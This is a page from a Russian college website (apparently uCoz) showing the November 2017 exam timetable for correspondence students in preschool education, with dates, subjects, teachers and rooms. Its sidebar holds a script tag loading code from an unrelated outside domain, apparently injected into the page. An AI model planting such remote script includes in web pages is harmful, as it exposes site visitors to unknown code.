Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 193

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

 Рассписание 

DOC - Версия Рассписания        PDF - Версия Рассписания 

УТВЕРЖДАЮ

Директор колледжа

_________________Г.В. Прейс

«      » ___________________2017 г.

Расписание

осенней экзаменационной сессии студентов заочной формы обучения  ГАПОУ ТО «Голышмановский агропедколледж»   специальности 44.02.01 Дошкольное образование,  группа  ДО - 011/16 (з)

с 06 ноября по 25 ноября 2017 г.

 

День недели

Число

Наименование дисциплины, МДК

Преподаватель

Кабинет

День недели

Число

Наименование дисциплины, МДК

Преподаватель

Кабинет

ПН

 

 

 

 

 

ЧТ

 

16.11 13-45

МДК 02.04 Практикум по художественной обработке материалов и ИЗО, пр.,6ч., 1 подгр., ДКР

МДК 03.02 Теория и методика развития речи у детей, пр. 6 ч, КП

 

Смольникова Л.Е

 

 

Ясенецкая Т.В

36

 

 

 

31

ВТ

07.11

13-45

Безопасность жизнедеятельности, лк., 4ч

Иностранный язык, пр., 2 часа

Ануфриев Д.С

Павленко Т.А

Сыздыкова Н.Б

42

1

2

ПТ

17.11

 

Учебная практика МДК 02.05

Баканова Т.А

 

 

 

 

 

 

 

13-45

МДК 03.04 Теория и методика математического развития, лк., 4 ч.

Пономарева Е.В

30

СР

08.11 13-45

Информатика и ИКТ в профессиональной деятельности, лк.2ч.

Щеткова В.В

17

СБ

18.11

МДК 03.04 Теория и методика математического развития, пр., 6 ч., КП

Пономарева Е.В

30

 

 

Информатика и ИКТ в профессиональной деятельности, пр.,.4ч. 1 подгруппа

Безопасность жизнедеятельности, пр., 2 ч., 2 подгруппа, ДКР

 

Щеткова В.В

 

 

Ануфриев Д.С

17

 

 

42

 

 

 

 

 

ЧТ

09.11 13-45

Иностранный язык, пр., 2 часа

 

Павленко Т.А

Сыздыкова Н.Б .

1

2

ВС

19.11

выходной

 

 

 

 

Информатика и ИКТ в профессиональной деятельности, пр.,.4ч. 2 подгруппа

Безопасность жизнедеятельности, пр., 2 ч., 1 подгруппа, ДКР

 

Щеткова В.В

 

 

Ануфриев Д.С

17

 

 

42

ПН

20.11

Учебная практика МДК 02.05, диффер. Зачет.

Баканова Т.А

22

ПТ

10.11 13-45

МДК 02.06 Психолого-педагогические основы организации общения детей дошкольного возраста, лк., 4ч.

Попова Л.Ю

10

 

 

МДК 02.03, пр., 4 ч., 1 подгруппа, ДКР

МДК 02.06, пр., 4 ч., 2 подгруппа, ДКР

Дюкова А.И

Попова Л.Ю

39

10

 

 

МДК 02.03 Теоретические и методические основы организации продуктивных видов  деятельности детей дошкольного  возраста, лк., 2 ч.

Дюкова А.И

39

ВТ

21.11

Учебная практика  МДК 02.06

Попова Л.Ю

 

 

 

 

 

 

 

13-45

Иностранный язык, пр., 4 часа

 

Павленко Т.А

Сыздыкова Н.Б .

1

2

СБ

11.11

 

МДК 02.05 Теория и методика музыкального воспитания с практикумом, лк.,4ч.

 

Баканова Т.А.

22

 

 

 

 

 

 

 

МДК 03.02 Теория и методика развития речи у детей, лк. 2 ч

Ясинецкая Т.В

31

СР

22.11

Учебная практика  МДК 03.02

Ясинецкая Т.В

30

 

 

.

 

 

 

13-45

МДК 02.03, пр., 4 ч., 2  подгруппа, ДКР

МДК 02.06, пр., 4 ч., 1 подгруппа, ДКР

Дюкова А.И

Попова Л.Ю

39

10

ВС

12.11

выходной

 

 

 

 

 

 

 

ПН

13.11

13-45

МДК 02.04 Практикум по художественной обработке материалов и ИЗО, пр.,6ч., 1 подгр.

МДК 02.05 Теория и методика музыкального воспитания с практикумом, пр.,6ч., 2 подгруппа, ДКР

 

 

Смольникова Л.Е

 

 

Баканова Т.А

36

 

 

 

22

ЧТ

23.11

Учебная практика  МДК 03.02, диффер. зачет

Ясинецкая Т.В

30

 

 

 

 

 

 

13-45

Иностранный язык, пр., 2 часа , зачет

 

Павленко Т.А

Сыздыкова Н.Б .

1

2

 

 

 

 

 

 

 

ПП МДК 02.02, диффер. зачет

Дюкова А.И

39

ВТ

14.11

13-45

МДК 02.04 Практикум по художественной обработке материалов и ИЗО, пр.,6ч., 2 подгр.

МДК 02.05 Теория и методика музыкального воспитания с практикумом, пр.,6ч., 1 подгруппа, ДКР

 

 

Смольникова Л.Е

 

 

Баканова Т.А

36

 

 

 

22

ПТ

24.11

Учебная практика  МДК 03.04

Пономарева Е.В

30

 

 

 

 

 

 

13-45

ПП МДК 02.01, диффер. зачет

Дюкова А.И

39

                                                                       

                                                И.о  заведующего отделением                                                                                                                    А.И.Дюкова

                                                                                                                                                                                                             

 



Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Октябрь 2018  »
ПнВтСрЧтПтСбВс
1234567
891011121314
15161718192021
22232425262728
293031

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2018
Создать бесплатный сайт с uCoz